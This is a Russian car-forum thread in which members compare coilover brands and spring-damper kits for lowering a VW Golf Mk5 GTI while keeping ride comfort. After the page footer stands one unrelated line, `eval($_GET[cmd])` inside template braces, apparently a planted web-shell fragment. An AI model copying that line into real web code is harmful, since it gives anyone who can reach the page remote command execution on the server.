+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 43

Тема: посоветуйте винты


  1. #1
    GTI-Racing sixtynine is on a distinguished road Аватар для sixtynine
    Регистрация
    12.08.2011
    Откуда
    Бобруйск-на-Амуре
    Машина
    Кролик
    Сообщений
    102

    Question посоветуйте винты

    ситуация такая: хочу занизить golf mk5 gti (ППД туарего-гти для зимы отлично,но смотриться отвратно). Основное требование - комфорт и надежность. Ездил на некоторых машинах-табуретках. Не хочу свой ГТИ делать табуретистым.

    Какие винты брать?

    Почему винты, а не комплект пружины-аморты? Потому что хочется занижать по своему усмотрению )

  2. #2
    GTI-Racing graylove is on a distinguished road Аватар для graylove
    Регистрация
    26.04.2010
    Откуда
    Питер
    Машина
    Mk4GTI
    Сообщений
    135
    Рейсленд бюджетно и надежно, и не очень жестко
    XYZ попонтовей тем что с регулировкой жесткости..если все на минимум по жесткости поставить то норм будет :)

    но например у меня после лета задние стойки хузов перестали подниматься)) так сказать зависли в положении самый низ :)

    если деньги есть то можно взять H&R винты они под 50 вроде стоят
    I love Gti
    1.8T\ARZ

  3. #3
    GTI-Racing schummi004 is on a distinguished road Аватар для schummi004
    Регистрация
    07.06.2010
    Откуда
    Москва
    Машина
    Audi S3
    Сообщений
    549
    На гражданской машине, винты бред. Проходили уже это. 90% владельцев винтов, поиграются неделю с настройками и потом ездят в одном и том же положении. Лучше взять нормальный комплект типа били+эйбах или хаэры.

  4. #4
    GTI-Racing Окислитель is on a distinguished road Аватар для Окислитель
    Регистрация
    16.04.2008
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    847
    + 1. Причём 99% из тех 90%кто играл с "настройками" знают только две "настройки", высоко и низко.
    Оборудование и инструмент в том числе для ремонта любимого VW.

  5. #5
    GTI-Racing sixtynine is on a distinguished road Аватар для sixtynine
    Регистрация
    12.08.2011
    Откуда
    Бобруйск-на-Амуре
    Машина
    Кролик
    Сообщений
    102
    я и не планирую каждый вечер в гараже поднимать-опускать )

    я имел ввиду, что хочется занизить по своему усмотрению. потому что на комплекте пружины-аморты бывает "перед сел, зад высоко", или наоборот. хочется иметь возможность изначально посадить машину красиво.


    просто костотряс не хочется, потому что машина единственная и я много времени в ней провожу

  6. #6
    GTI-Racing schummi004 is on a distinguished road Аватар для schummi004
    Регистрация
    07.06.2010
    Откуда
    Москва
    Машина
    Audi S3
    Сообщений
    549
    Цитата Сообщение от sixtynine Посмотреть сообщение
    я и не планирую каждый вечер в гараже поднимать-опускать )

    я имел ввиду, что хочется занизить по своему усмотрению. потому что на комплекте пружины-аморты бывает "перед сел, зад высоко", или наоборот. хочется иметь возможность изначально посадить машину красиво.


    просто костотряс не хочется, потому что машина единственная и я много времени в ней провожу
    Последней фразой ты сам ответил на свой вопрос. Ни одни винты не будут комфортными, даже в самом мягком положении.

  7. #7
    GTI-Racing senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold senka is a splendid one to behold Аватар для senka
    Регистрация
    22.01.2009
    Откуда
    Москва
    Машина
    VW Golf 5 E30
    Сообщений
    1,095
    Цитата Сообщение от schummi004 Посмотреть сообщение
    Последней фразой ты сам ответил на свой вопрос. Ни одни винты не будут комфортными, даже в самом мягком положении.
    у Леши Malex'а вполне себе комфортные винты. Koni по моему. по сравнению с моими H&R по крайней мере они мне показались очень мягкими.

  8. #8
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от schummi004 Посмотреть сообщение
    Последней фразой ты сам ответил на свой вопрос. Ни одни винты не будут комфортными, даже в самом мягком положении.
    Биль ПСС9 Б16 у меня были в среднем положении жесткости и по высоте не очень низко. И управляемость и клиренс и жесткость все под мои желания на 100%. Если поставить еще мягче, то будет почти как на стоке, этим например эта подвеска и подкупает, не зря лучшее, что делал Биль для гражданских авто из своей линейки.

    Пофиг, что они винты и я их не крутил вообще никогда, но на то я и хотел себе все в одном без компромиссов. Вот до этого КВ вар.1 был мне не очень, ибо не регулирвоалась жесткость и было немного для меня жестковато, и по высоте в самом "высоком положении" было не достаточно высоко ) ...... так конечно согласен, винты для большинства это просто поставил покрутил и забыл, но именно этого как раз и не хватает если просто купить подвеску "не винты", но потом столкнуться то нравится, то не нравиться ). Т.е. если есть деньги, то надо брать )
    песок сыпется....не останавливайтесь на достигнутом !

  9. #9
    GTI-Racing sixtynine is on a distinguished road Аватар для sixtynine
    Регистрация
    12.08.2011
    Откуда
    Бобруйск-на-Амуре
    Машина
    Кролик
    Сообщений
    102
    кто что знает про BC-racing?

  10. #10
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Цитата Сообщение от sixtynine Посмотреть сообщение
    кто что знает про BC-racing?

    чем больше ты найдешь вариантов подвесона редких марок, тем больше будет знаков вопроса
    песок сыпется....не останавливайтесь на достигнутом !

+ Ответить в теме
Страница 1 из 5 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. б\у винты Mk4
    от 4 motion в разделе Покупка и продажа запчастей
    Ответов: 0
    Последнее сообщение: 19.05.2015, 13:09
  2. винты D2 на VAG
    от popoopop123 в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 14
    Последнее сообщение: 17.06.2014, 08:47
  3. Винты XYZ
    от M3f в разделе Тюнинг
    Ответов: 17
    Последнее сообщение: 21.01.2013, 21:30
  4. Винты Jom
    от Kappaa в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 42
    Последнее сообщение: 01.04.2010, 20:42
  5. !Винты!
    от Antonio в разделе Тюнинг: подвеска, ходовая, тормозная система, КПП
    Ответов: 14
    Последнее сообщение: 18.10.2007, 13:19

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}